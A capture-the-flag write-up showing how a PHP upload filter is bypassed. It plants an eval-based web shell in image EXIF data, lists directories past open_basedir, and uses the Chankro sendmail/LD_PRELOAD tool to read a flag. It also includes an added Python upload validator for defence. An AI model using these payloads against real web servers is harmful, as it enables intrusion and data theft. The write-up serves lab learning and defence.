-=[File Upload vulnerability, combined with the sendmail php CVE]=-
We log in at: http://challenges.ecsc-teamfrance.fr:8001/
We create an account and land on a TODO page where we can save a file with a title and a description.
Step 1: GUI discovery and upload exploit
We upload a random file to trigger an error or some other new behaviour. The error tells us our file must be a PNG or JPG image smaller than 100 KB.
I decided to append PHP code to the end of the picture and change the file's extension to .php:
echo "<?php phpinfo(); ?>" >> monimage.png
cp monimage.png monimage.php
Look at the uploaded image: nice, our PHP code ran!
We can see the famous phpinfo page. The phpinfo() call executed from our page gives us interesting information such as the open_basedir restrictions and disable_functions. Now let's add a remote command execution parameter to our picture:
exiftool -comment="<?php eval(\$_GET['cmd']) ?>" monimage.png
Don't forget to escape $ with \ because of bash.
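As an added example (not code from the writeup or from the challenge), here is the server-side validation that would have rejected both tricks above: it trusts magic bytes rather than the extension, refuses data appended after the image's end marker, and refuses any PHP open tag inside the metadata. The stored name is generated by the server; the sample blobs are constructed and only contain the bytes these checks inspect, not real decodable images.

```python
import re
import secrets

MAX_UPLOAD_BYTES = 100 * 1024  # the 100 KB limit the challenge's error message states

# Magic bytes of the two formats the application says it accepts.
SIGNATURES = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff"}

# PHP open tags: <?php, <?= and the short tag "<? " (XMP's <?xpacket is left alone).
PHP_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)


def validate_image_upload(data: bytes) -> tuple:
    """Return (accepted, reason, stored_name).

    The stored extension comes from the detected type only; the client's file
    name (and any .php extension on it) is never used, so nothing gets executed.
    """
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "too large", None

    detected = next((ext for ext, sig in SIGNATURES.items() if data.startswith(sig)), None)
    if detected is None:
        return False, "not a PNG or JPG", None

    # A real PNG ends with its IEND chunk and a real JPEG with the EOI marker;
    # anything after that is the footprint of the "echo '<?php ...' >> image" trick.
    if detected == "png" and not data.endswith(b"\x00\x00\x00\x00IEND\xaeB`\x82"):
        return False, "trailing data after PNG IEND", None
    if detected == "jpg" and not data.endswith(b"\xff\xd9"):
        return False, "trailing data after JPEG EOI", None

    # Catches tags hidden inside metadata (the exiftool -comment technique).
    if PHP_TAG.search(data):
        return False, "embedded PHP tag", None

    return True, "ok", f"{secrets.token_hex(16)}.{detected}"


# Constructed samples: a minimal PNG skeleton, the same file with phpinfo() appended,
# and a JPEG skeleton whose COM (comment) segment carries a PHP tag.
CLEAN_PNG = SIGNATURES["png"] + b"\x00\x00\x00\x00IEND\xaeB`\x82"
APPENDED_PNG = CLEAN_PNG + b"<?php phpinfo(); ?>\n"
COMMENT_JPG = SIGNATURES["jpg"] + b"\xfe\x00\x15<?php phpinfo(); ?>" + b"\xff\xd9"

if __name__ == "__main__":
    for name, blob in [("clean", CLEAN_PNG), ("appended", APPENDED_PNG), ("comment", COMMENT_JPG)]:
        print(name, validate_image_upload(blob)[:2])
```

Even with these checks, the upload directory should not be served with PHP execution enabled; re-encoding the image server-side additionally drops every metadata field.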
Step 2: Discover the backend
We now have access to the backend through our cmd parameter.
–> Activate error display (debug mode)
http://[..]:8001/upload/c69c252b[...]29db4a/monimage.php?cmd=ini_set('display_errors', 1);
–> List the /tmp content (I saw that path in the open_basedir restriction entry)
http://[..]:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a/monimage.php?cmd=ini_set('display_errors', 1);print_r(scandir('/tmp'));
–> Read the "LABOUSSOLE" file in /tmp
http://[..]:8001/upload/c69c252b[...]29db4a/monimage.php?cmd=ini_set('display_errors', 1);var_dump(readfile('/tmp/LABOUSSOLE'));
==> In the file: "RDV 00h00 a la bousolle". It must be a public folder on the server that people can write to. I also tried:
http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b[...]29db4a/monimage.php?cmd=ini_set('display_errors', 1);file_put_contents('/tmp/jadorelablockchain', "test");
Then I tried to read my file back. It works.
Step 3: Looking for other vulnerabilities
I was looking for other vulnerabilities. I tried to read from /, but the open_basedir restrictions don't permit it.
#1ST IDEA: a vulnerability with glob:///* to bypass the open_basedir restrictions. With it I can list /. Look here for details: https://bugs.php.net/bug.php
I can see a flag file but I don't have the absolute path to it, so I can't read it. Payload I used:
<?php
if ($dh = opendir($_GET[1])) {
    while (($file = readdir($dh)) !== false) {
        var_dump($file);
    }
    closedir($dh);
}
?>
Never mind…
#2ND IDEA: I looked for a CVE about sendmail in PHP. A few months ago I heard about that CVE. Check that link for more:
I found a tool called "Chankro": https://github.com/TarlogicSecurity/Chankro. It allows bypassing the open_basedir restrictions and disable_functions. Such a great find.
–> How the tool works:
1. I created my payload rev.sh:
find / -name flag -type f 2>/dev/null > /var/www/html/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a/flag.txt
(Find the flag file, redirect errors to /dev/null, and write the content of the flag file into flag.txt in my upload folder.)
2. The --path option sets the destination.
I get the exploit. So I put the tool's output into my picture's EXIF:
$ exiftool -comment="[...]" monimage2.png
Back to the menu: upload my picture and open it in the application.
http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a/monimage2.php
Go to the flag.txt location to see if it worked.
http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a/flag.txt
.: FLAG :.
ECSC{f12d9ff3a017065d4d363cea148bef8bfffacc31}